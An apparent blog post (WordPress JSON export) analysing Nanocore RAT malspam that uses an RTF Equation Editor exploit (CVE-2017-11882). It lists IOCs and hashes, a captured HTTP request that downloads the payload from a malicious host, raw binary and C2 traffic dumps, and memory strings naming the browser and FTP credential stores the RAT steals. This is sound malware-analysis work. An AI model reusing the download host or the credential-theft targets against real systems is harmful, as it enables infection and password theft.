{"id":1196,"date":"2018-11-01T13:16:46","date_gmt":"2018-11-01T13:16:46","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=1196"},"modified":"2018-11-01T13:16:46","modified_gmt":"2018-11-01T13:16:46","slug":"2018-10-31-nanocore-malspam","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=1196","title":{"rendered":"2018-10-31 Nanocore Malspam"},"content":{"rendered":"

While looking through the email filters this morning, I came across several emails that had malicious Word docs attached to them. The sender was the same for all the emails along with the document that was attached. This is a write-up of what I was able to get from the malware on my VM. After doing some research it looks as if this malware is related to the Nanocore RAT. For more information about what this RAT is, please see the following link:\u00a0<\/p>\n

http:\/\/www.stratosphereips.org\/blog\/2018\/9\/7\/what-do-we-know-about-nanocore-rat-a-review<\/a><\/p>\n

For all the artifacts from this investigation, please see the the Github repo located here<\/a>.<\/p>\n

\"\"<\/a><\/p>\n

IOCs:
\n=====<\/p>\n

shinkoh[.]com[.]my \/ 210[.]48[.]153[.]240 (TCP 80)<\/p>\n

194[.]5[.]98[.]182 (TCP 7020)<\/p>\n

Artifacts:
\n==========<\/p>\n

File name: PO.doc
\nFile size: 3.7K
\nFile path: NA
\nMD5 hash: 757e0b687db4d4e78c52165362642d92
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/7fb596b1ca23917da79268796af7238049f2245536a30d6a96b1721740cbff5c\/detection<\/a>
\nDetection ratio: 19 \/ 57
\nFirst Detected: 2018-10-31 09:37:11
\nAny.Run: http:\/\/app.any.run\/tasks\/b1d7fd66-5fdb-44bc-b631-800b60eed5bd<\/a>
\nFile name: downloads.exe
\nFile size: 544K
\nFile path: C:\\Users%username%\\AppData\\Roaming
\nMD5 hash: 096c2a7b6d26917ed897638e2d89ee79
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/aefd739e1378c37d3e4cdf82217550942ba2222952486c1a0268d9c94f83b776\/detection
\nDetection ratio: 11 \/ 68
\nFirst Detected: 2018-10-31 12:29:03<\/p>\n

File name: catalog.dat
\nFile size: 1K
\nFile path: C:\\Users%username%\\AppData\\Roaming\\23A8A75E-E6D9-4C28-881C-1B596423337D
\nMD5 hash: 32d0aae13696ff7f8af33b2d22451028
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/5347661365e7ad2c1acc27ab0d150ffa097d9246bb3626fca06989e976e8dd29\/detection<\/a>
\nDetection ratio: 0 \/ 59
\nFirst Detected: 2018-06-03 17:03:30<\/p>\n

File name: run.dat
\nFile size: 1K
\nFile path: C:\\Users%username%\\AppData\\Roaming\\23A8A75E-E6D9-4C28-881C-1B596423337D
\nMD5 hash: 243846a167653be9f548d6e9ff15fca4
\nVirustotal: NA<\/p>\n

File name: settings.bin
\nFile size: 1K
\nFile path: C:\\Users%username%\\AppData\\Roaming\\23A8A75E-E6D9-4C28-881C-1B596423337D
\nMD5 hash: 4e5e92e2369688041cc82ef9650eded2
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/f8098a6290118f2944b9e7c842bd014377d45844379f863b00d54515a8a64b48\/detection<\/a>
\nDetection ratio: 0 \/ 59
\nFirst Detected: 2017-03-27 03:35:44<\/p>\n

File name: storage.dat
\nFile size: 417K
\nFile path: C:\\Users%username%\\AppData\\Roaming\\23A8A75E-E6D9-4C28-881C-1B596423337D
\nMD5 hash: 963d5e2c9c0008dff05518b47c367a7f
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/5eacf2974c9bb2c2e24cdc651c4840dd6f4b76a98f0e85e90279f1dbb2e6f3c0\/details<\/a>
\nDetection ratio: 0 \/ 59
\nFirst Detected: 2016-02-02 18:46:20<\/p>\n

File name: wanss.exe
\nFile size: 544K
\nFile path: C:\\Users%username%\\AppData\\Roaming\\23A8A75E-E6D9-4C28-881C-1B596423337D\\WAN Subsystem
\nMD5 hash: 096c2a7b6d26917ed897638e2d89ee79
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/aefd739e1378c37d3e4cdf82217550942ba2222952486c1a0268d9c94f83b776\/detection<\/a>
\nDetection ratio: 11 \/ 68
\nFirst Detected: 2018-10-31 12:29:03<\/p>\n

File name: KB_272984.dat
\nFile size: 1K
\nFile path: C:\\Users%username%\\AppData\\Roaming\\23A8A75E-E6D9-4C28-881C-1B596423337D\\Logs%username%
\nMD5 hash: d8ec13785158551956718439b276b49a
\nVirustotal: NA<\/p>\n

Analysis:
\n==========<\/p>\n

This maldoc is not an actual Word document, but actually a RTF file as seen by running the command “file” against the file:<\/p>\n

\r\nMQ60M2FVH6:Maldoc herbie.zimmerman$ file PO.doc \r\nPO.doc: Rich Text Format data, unknown version\r\n<\/pre>\n
and also via the rtfobj command which is included in the OLETools found here: http:\/\/github.com\/decalage2\/oletools.\u00a0<\/p>\n
\r\nMQ60M2FVH6:Maldoc herbie.zimmerman$ rtfobj PO.doc \r\nrtfobj 0.53.1 on Python 2.7.10 - http:\/\/decalage.info\/python\/oletools\r\nTHIS IS WORK IN PROGRESS - Check updates regularly!\r\nPlease report any issue at http:\/\/github.com\/decalage2\/oletools\/issues\r\n\r\n===============================================================================\r\nFile: 'PO.doc' - size: 3749 bytes\r\n---+----------+---------------------------------------------------------------\r\nid |index \u00a0 \u00a0 |OLE Object\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\r\n---+----------+---------------------------------------------------------------\r\n0\u00a0 |0000003Fh |format_id: 2 (Embedded) \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\r\n\u00a0\u00a0 |\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 |class name: 'eqUAtioN.3'\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\r\n\u00a0\u00a0 |\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 |data size: 1798 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\r\n---+----------+---------------------------------------------------------------\r\n<\/pre>\n
Based on the output from rtfobj, we can see that this is leveraging the Microsoft Equation editor buffer overflow exploit (CVE-2017-11882). For more information about how this works, please see Palo Alto’s Unit 42 write up here: http:\/\/researchcenter.paloaltonetworks.com\/2017\/12\/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild\/.\u00a0You can also see this operation via the Process Tree from Process Monitor as seen below.<\/p>\n
\"\"<\/a><\/p>\n
Once the exploit has taken hold, the Equation Editor pulls down the file called “_outputA446BDFrolex.exe” which then gets copied over to the “C:\\Users%username%\\AppData\\Roaming” path and then gets executed (PID 2588).
\n\u00a0<\/p>\n
\r\nGET \/_outputA446BDFrolex.exe HTTP\/1.1\r\nAccept: *\/*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: shinkoh.com.my\r\nConnection: Keep-Alive\r\n\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 31 Oct 2018 16:29:19 GMT\r\nServer: Apache\r\nLast-Modified: Wed, 31 Oct 2018 00:04:46 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 556960\r\nConnection: close\r\nContent-Type: application\/x-msdownload\r\n\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n\r\n$.........y.....................................Rich............PE..L...Sp.=.....................`....................@..........................`..............................................T...(........C...........`......................................................(... .......<............................text............................... ..`.data...$...........................@....rsrc....C.......P..................@..@...I............MSVBVM60.DLL...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.\t.f.j.f1h.f...f)..f...fbr.f...fA\t.f.v.f.n.fvj.f+d.f.v.f:..ft.\r\nfn..f..\r\nf.I.f...f..\r\nf...fX..f...f\/p.f.b.f=N.ft..f...f..\r\nf...f..\r\nf.\t.f\r\n.\r\nf...f...f...f.G.f...f...f...f.u.fH..f}i.f+..f_S\r\nfg..f7.\r\nf:..f:..fJl.f.l.fT.\r\nfn..f...f.5.f\/N.f."\r\nf..\r\nf...f...fpu.f.m.fM..f...f0l.f>. \r\n<\/pre>\n
\"\"<\/a><\/p>\n
Once the original process for “downloads.exe” (PID 2588) has been running for a bit, it opens another instance of itself (PID 3040) and this is the process that writes out the other files within the “Roaming” folder and the sub-folders. It is the process that is also responsible for reaching back out to the IP address of 194.5.98.182 on port 7020 which looks to be encoded or encrypted.<\/p>\n
\r\n 8...._..C.!.W*?.y..y.d..\tq...h ..].......Nk0..oI|M.)0#.....\r\n.......2CY.x .......S......mn.hp.B...:ge..&K.U%........|>aYB....'....3..St.uL..#ZcG..X.D.ib.Y....s.n.....AV.p..z..}W..y%......v..C....T8qc......\/....U.\t.A~s|.".\\H\/.b.&0..<F8|.$j......x.y.....6{.2z.w.\\....0....-.<.......Q{!L.sW\\..P_.q.h.~....s.(.>.a.ze..6.=...E..>3V.)...........(j........~..z.....s.0<.....rR.A....!...i5{...8..\/\r\n.@..:...C}......\r\nzF\r\n)..x...8.....j.T.............d..(G.............'....\r\n?^.A........h..F8!3.X.U.c1..J.v......JdN..A....k(H.z...`l...b.\\g..a..5.$8 .l..bsnF(klj.........9N.$r.\t1....8..]...o.....G-t|...-......._y._......l'..+$.....Y].M...C....N:.5.cD`.sd.}r=...R.w.....'....3..St.uL..#.#..v&._.V....._..\r\n..p..YC....N.n..f.mf.e...B[...-.+..vp1..\/RBf.0..r9,.....bi..\\.K.v......{..2........8.^...)g.....e.."s.t..!....._..$......:3... ........2bl...g,.i.K..%4..Q...4....9.:2..K...B.Tgo@T..hx..\r\n.."...B;C...........X....Z...2.Kv...."4..S)...k...<....6?.k...V~...9\\P..|..&b...;;.....Hz.Hn.X.|...C0A0=..@..~#.W...Yl.CO^..$....kn.q..c.,.ts....xY....v..l;.^.%f.y........?vt...7.K...eV......[.."}c3..G.d.e..D\\N.4s..*......l.o[.........j...6.-sg.n...2.}.X......@L..jTI...!PR?3]..kk....\t....[.H'u..._.2.L....Am....!;k....1.nP*V....LfK|f..G..u......K.y......]...ET..yE3...\r\n..}|..H\t:.c..]I...W\r\nT......Lf!5<.Emd.u...%?..c1P....t.{.7L.'.........Ax..x,........S*..;..-g..6.-V..@.6s......N...'.+......'.....S.p..G.m.P.o........M].G.....Hl..}>.,.2.fn....>ic.zYP.....2....R.9A.Ht]#.q...{......wj^.(....b.v@...[DQi.(}e|.\tVi.\t....2..Q,G.{..............Z..#R..H....V...N+\\.~lp,...[......7p.,\r\n..9Y."...8.Y....{...x.~.@..s3,..d..k.*Fa...0.:9*.J...[.G.H..[5....d....{...Z.J..]t.J...7hF....I...h,I_m.H.x"Bd..;`m,...R.....LO.8$ ..x.$.....o.q7....W...Yu[..J.%.....,...Yl.a...T.}.....Y%nUg...Kl..r.....M....k.o........GZ."E.J...<of..A........h......G|..r.H,.....j...........8<ml.....2t`\/#.p.Y..&.2.q..9...([.z.b\\.e.....F>.........?...k2Yu..'B..b.N8.&kFt......)....cY5=.z.q....i............?...R...\\.f?....U@.,....kT'.q..>VD...j0.*.....U.M.....<...}4E|H.8.y|1.O^..v.I...Xc....OU..n..jBvV.n.......U.OTN.0-C...k....|.?.......hI)z..Y...Y,...7(.......m..h[.U.....cQ0M?...N.q.j...>..1N.......2W...'c....2..............s.;.m.....0#.7.aJp.j...*.L.EV.M...d....}...C.;..h...u{.l.y.Z.....=.f.$. ,~JQ`R..p....q6.(0.<r.g...\r\n~.{3.....U..}\r\n.M.{..,2...+c..a..8....'&\t.^H.\r\ni4.8...To....{\/..w...@.\tP.l+.I z....s.....V\ta....hY.g...}.~..F\t.6..\r\n.P\/..!#....1...aLe...cH.xw2.@..@......2w]... ...e.u...........lN...vf..lf........:\/....."..(..>...?.x.D..[.0oN,.M.3.{.<\t"Z.=8.....^X..=..*:....F@.b...?...V....KI{.....?`......G.R=....1..Ev).[....\\.}.9|O..0......b8".?.....N....S ....S...kR.e..vy.......#...v....G&.D..^..4.K.\r\n"z..!.idA.Hs%...E..G.....!.\tc.W.-.IS..WC6...f................KmJX."{0....Mf..(..eq.B....\\...Z......N.\/..\\|j=.4.....)...d...O.......I..h.....].M$.u..Y.(|^._...I...*.O...{.^..+G..C..M.o..!.=..R?....%..=,..-.....D..6..\r\n..MWq.....d.].xiu.cx......M._.. .....@X.3x..\\...\r\n:..\/:.......:2.&.#...).o.t...J..#'....k..&.K\r\nQ.{.tu.....].+.8...qHi..3_..6...]....%.?8y..mwA.....(*oJI.<5.>.]um..ky.......->.C.o...-.S...$..G`55Z.Z..C.G8....?w..l..x...Bl!.(r\\...b..8..zIo.......@f..IGt-~.(.j.T.i.C.]...z..^."..#...PB.T.c...?u....z.S:.`..d?.\\@p.q"[.F...Tm..^..........'..P..\r\n.H.'W...f'.z.{...S..vM\r\n.t.i7.....-...<...qo.77.........Lz.m..'j"V77..X..tt..t!....QRi....D......K3...#y.F.B.....q..?..........qu......FS.d..`l4..._...+.....]..........e......<B.f....)9FS.\t..r..~a.-W&..!..UT..+e.d....-..g....|.......C=...g.J..>..E..!.....-....!D......Z\r\n..2...q.....A.n...ll...m....{F......#.\/c....F..5e.e...Y...].s..:.f.@...$d..g`.m.Z9....k;.m........H...U..:..n....SJ.......!.LL..Q...T..H.{.9fU.bN.......*-...........\t@...%,..1.XG^y..).....4A..l...S..,ZB...s.....<.%.C.-..(.z.........p.Z.?...rB.JZ.......Q.\ttU....B+...)H.".\\....>..H..H".N..u<\\......Bb..4.e.\/....bN\t..a|.A...^.x..P'B+.JF..>sYD.6....\/Y. C~..'...n2.x.ZxK.JC... .0..6.....\r\nU..:....,..^O.......\t......M~..i..C[..\r\n..*..m........9.....%=b.R]...^W.,........r...la.....v!...9...."z..1..+..\r\nL.AA....4Lg..C..........U..&."f.X32....&.....6f[..YK..._l.z.x.\/\t..i[9.7."..6.ED.]y..\\..hJ*...6Td.B\/V...triJ...l....J[1....t..Dy..-$......5......;:M...s.U@....W.b....\\.H.<.*..V..\r\n....{..a..,.d!...........Z..zM?.q......h......)i[s.8.;..0]....hj.,.|PX.......evR..v..(..o....Q7.....D}...\\.10.D[..r.Q.G..f.|.CG..#...8..4.<...b`....P.......gy?mR.x...?....L....?........o.B.^.p..-..L.#.........\r\nCO.5.J..t.j....$hO .D.;..hE\r\nc...}.KWD.(.......j..Gf....7..y........y^......s.,..K0\r\nj1<...e(.Kek.DLYu!z. .......P..or.....+9...@&B...N\t...o..\r\n.T[dF....4L...)V....P...Pm...Q...A..;...]....>}.....w..\t$.....3.C.,..bx.....)R......r.-z..}..n....[.1...C..gI......J..Vd...\t.h....|..Z... .\/n..ST&....|2.}.EE-+.....4pq.....O..I.....(.)....U..3.K.i..O..z....$.}.\t..@.`9..._.... >..g3...,.x.HpS.........3Fz.KaB....\\...LN.x.&....dq......!N.}$.._...vV.u.1j..............':DC.+.."E@S.2..|7^`........y0uF.P\t....+.29.Ce.f.-.6..C...cX..o.r.Eg...% S.,D.E..K_.P:..AF@.......^\t...P.Xv.....p.f$??.\\.%..H\/wl......P.D...\t.+....U!zK...B.Dw.>...k..S........h.x|..-...E.......".m..R... .d.ak+....k\t..^.....).lN.t.(K..R.P..>.T.,.....#.g.0..+T.R@....DM.E...yuu..~.5W...A..h^.....tn..s...X....|].(.{!r.\\_.R...N..q.......t........b.u..q.\/r.uT&|...X.2M4po.*0A..........3....a`.aU ._.)....F.*......w...*.o........hjb.Y.."J..+q.. =.z..<.......x._..=.... *......h.8.EUD.M..L.6.h.2.8..!...H..x`. x..d...I....M.R+.5..`.T.. m.,......\\..)......]X.zl...(.zD..e...bP..bi.3...V.Q+.;........n.........9zR....v...W.`........m..V...G.5C8wk~qV..I...$.M..r..,..N.D.....b..v..*....k.D2F..di....&....x.....{&....7.p...DZ\/...}.......5w.N.8......Ecgh.\/h6.o..5z.....;Q.P.....C=....6.PRF..1....%T...<F...SB.....O..y.0*.T.E.....y...l h4..&.{.....h....G.0$L..ER_4..+@...1.v..n...&5....<\t....5.'....$..'.M.........K..\\C..V:2Z.\tr.[.y.W.@...!.\r\n...&.Q.5.Ru....|.9.3}>..o.C.Rm.......T"n,S.k.Ja..O..T.LPr.....j.rl<.%..d.t7..n....@@B.Yl.....5.K\\"f#V8..1K.{.=..)...r....!:.\t.2?...Vx9\/u..:.fo..Y.Q.3.;..T....4.yv.]2.u...Z.S.... .7....8-!.@.IA...4.\\8).qii....!..C.....bI....O.E}.&....N..x.#.....z..pq..%a.._.n1\\7..b*\r\n....<rest of the stream>\r\n<\/pre>\n
\"\"<\/a><\/p>\n
As for the *.dat files, there was nothing readable in these files with the exception of the file called “KB_272984.dat.” I am not exactly sure what this log file is for as it did not capture any keystrokes from what I can tell.<\/p>\n
\r\n m\u00d9\u00d9[[explorer] Start menucmd \u00d0\u00d9\u00d9[#[Wireshark] Wireshark: Save file as2018-10-31-nanocoe-re l\u00da\u00d9[[explorer] Program Manager2018-10-31-nanocore \r\n<\/pre>\n
Persistence is maintained via the “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WAN Subsystem” key.<\/p>\n
\"\"<\/a><\/p>\n
I also ran the tool called “strings2” against the PID 3040 to see if there was anything that may be gleaned from memory. From just looking around in that log, there were some things of interest once I looked for the word “nano.” From what I was able to see, there are a lot of Japaense domains (..jp) as seen below.<\/p>\n
\r\nac.jp\r\nad.jp\r\nco.jp\r\ned.jp\r\ngo.jp\r\ngr.jp\r\nlg.jp\r\nne.jp\r\nor.jp\r\naichi.jp\r\nakita.jp\r\naomori.jp\r\nchiba.jp\r\nehime.jp\r\nfukui.jp\r\nfukuoka.jp\r\nfukushima.jp\r\ngifu.jp\r\ngunma.jp\r\nhiroshima.jp\r\nhokkaido.jp\r\nhyogo.jp\r\nibaraki.jp\r\nishikawa.jp\r\niwate.jp\r\nkagawa.jp\r\nkagoshima.jp\r\nkanagawa.jp\r\nkochi.jp\r\nkumamoto.jp\r\nkyoto.jp\r\nmie.jp\r\nmiyagi.jp\r\nmiyazaki.jp\r\nnagano.jp\r\nnagasaki.jp\r\nnara.jp\r\nniigata.jp\r\noita.jp\r\nokayama.jp\r\nokinawa.jp\r\nosaka.jp\r\nsaga.jp\r\nsaitama.jp\r\nshiga.jp\r\nshimane.jp\r\nshizuoka.jp\r\n<\/pre>\n
There were other domain names as well, but I can not be for certain as to why they are there.<\/p>\n
I also found some calls to what looks to be the Visual Studio project for Nanocore for a couple of different users:<\/p>\n
\r\nG:\\Users\\Andy\\Documents\\Visual Studio 2013\\Projects\\NanocoreBasicPlugin\\NanoCoreBase\\obj\\Debug\\NanoCoreBase.pdb\r\nP:\\Visual Studio Projects\\Projects 15\\NanoNana\\MyClientPlugin\\obj\\Debug\\MyClientPlugin.pdb \r\nC:\\Users\\Liam\\Documents\\Visual Studio 2013\\Projects\\NanoCoreStressTester\\NanoCoreStressTester\\obj\\Debug\\NanoCoreStressTester.pdb\r\nC:\\Users\\Cole\\Documents\\Visual Studio 2013\\Projects\\FileBrowserPlugin\\FileBrowserClient\\obj\\Debug\\FileBrowserClient.pdb\r\n<\/pre>\n
along with some information\/credentials that it was trying to obtain:<\/p>\n
\r\nSending shit\r\n[NanoScript] Connection to host has been lost, NanoScript will now remove all unwanted files.\r\nRemoving files\r\nGetDrives\r\n[Drive]|\r\n[Folder]|\r\nname\r\nFullName\r\n[File]|\r\nName\r\nLength\r\nRecieving passwords\r\n.vbs\r\nBatch\r\n.bat\r\nHTML\r\n.html\r\n.PHP\r\nProcessing Command\r\nabcdef123456789\r\nC:\\Users\\\r\n\\AppData\\Local\\Temp\\\r\n|Executed!\r\nExecuting Command\r\n[NanoScript] Cleaning up files...\r\nWallet\r\n\\Google\\Chrome\\User Data\\Default\\Login Data\r\nReadTable\r\nlogins\r\nGetRowCount\r\nGetValue\r\norigin_url\r\nusername_value\r\nGetBytes\r\npassword_value\r\n|[Chrome]\r\nAPPDATA\r\n\\CoreFTP\\sites.idx\r\nHKEY_CURRENT_USER\\Software\\FTPWare\\COREFTP\\Sites\\\r\n\\Host\r\n\\Port\r\n\\User\r\n\\Name\r\n|[CoreFTP]\r\n\\FileZilla\\recentservers.xml\r\n<Host>\r\n<\/Host>\r\n            \r\n<Port>\r\n<\/Port>\r\n<User>\r\n<\/User>\r\n<Pass>\r\n<\/Pass>\r\n|[FileZilla]|No Password Saved|\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FTP Commander\\UninstallString\r\nuninstall.exe\r\nFtplist.txt\r\n;Server=\r\n;Port=\r\n;Password=\r\n;User=\r\n;Anonymous=\r\nName=\r\n|[FTPCommander]\r\nWScript.Shell\r\nRegRead\r\nError\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Vitalwerks\\DUC\r\nUsername\r\nPassword\r\nThere is no host!\r\n|[NO-IP]\r\n\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\\r\n\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\*.xml\r\n<Password>\r\n<\/Password>\r\n<Name>\r\n<\/Name>\r\n|[SmartFTP]\r\nIndexOf\r\nSubstring\r\nUNIQUE\r\ntable\r\nSQLite format 3\r\nNot a valid SQLite 3 Database File\r\nAuto-vacuum capable database is not supported\r\nNo supported Schema layer file-format\r\nhttp:\/\/\r\nwww.\r\nPOST \/ HTTP\/1.1\r\nHost: Content-length: 5235\r\n[SST] Client has sent \r\n bytes \r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
While looking through the email filters this morning, I came across several emails that had malicious Word docs attached to them. The sender was the same for all the emails along with the document that was attached. This is a write-up of what I was able to get from the malware on my VM. After doing some research it looks as if this malware is related to the Nanocore RAT. For more information about what this RAT is, please see the following link:\u00a0 http:\/\/www.stratosphereips.org\/blog\/2018\/9\/7\/what-do-we-know-about-nanocore-rat-a-review For all the artifacts from this investigation, please see the the Github repo located here. IOCs:…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-1196","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1196","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1196"}],"version-history":[{"count":2,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1196\/revisions"}],"predecessor-version":[{"id":1206,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1196\/revisions\/1206"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1196"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1196"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1196"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}